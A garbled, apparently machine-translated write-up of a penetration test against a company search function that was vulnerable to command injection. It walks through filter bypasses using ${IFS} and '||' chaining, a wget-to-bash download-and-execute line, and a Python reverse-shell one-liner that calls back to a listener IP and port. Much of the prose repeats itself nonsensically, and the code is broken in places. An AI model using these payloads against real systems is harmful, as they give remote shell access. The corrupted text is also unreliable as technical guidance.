This afternoon in the company test (Mo) (Yu), through the search response keyword, an error message attracted my attention:
Whoami: whoami: whoami: whoami: whoami: whoami: whoami: whoami? So let’s test dnslog:
Looks like the filter is replacing a lot of special symbols, except for. ()&:/[space] = ()&:/[space] = ()&:/[space] = (); To convert the IP to a number, here’s a test using a service on your own server:
In Linux, {IFS} = {IFS} = {IFS} = {IFS} = {IFS} = {IFS} = {IFS} {IFS} replaces Spaces. IFS replaces Spaces. {IFS} 9 bypass: 9 bypass: 9 to truncate the role, 9 is the current shell process of the ninth argument, always empty string, so can also replace the empty string to be divided.
2. Redirection character
Construction content, pay attention to use | | and; Respectively before and after the closing part: 111 | | wget ${IFS} 3162736550;
Looks like it exists. Let’s just play it. Encoding (base64 or HEX) bypasses special characters in the bouncing shell:
The length detection limit is exceeded. Instead, use wGET to read the payload directly and execute. It takes a lot of time (or I’m too good). Wget download file: wGET -q-O-xxx.com download file: wget -q-O-xxx.com 11 | | wget IFS – q {IFS} – qIFS IFS – q {IFS} – O – {IFS} – the IFS – {IFS} XXXXXXXXX | bash. The request was received in the log, but the listener did not bounce back. Bash failed to execute, try again in another language (Python).
python -c "import os,socket,subprocess; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); S.c onnect ((1234) '192.168.99.242'); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(['/bin/bash','-i']);"Copy the codeThis time there is a response, but the error exit reply
/bin/bash = /bin/sh = /bin/bash = /bin/sh = /bin/bash = /bin/sh
Reflection: 1, through the response of the fingerprint keyword search can quickly locate the existence of the corresponding problems, such as SQL statement error, code execution error information and so on; 2. How can the connection between commands not be filtered? 3, real food 4, do not want to dish, read more books, read the cow force, white prostitute public data [ha ha ha I am a small handsome skin]
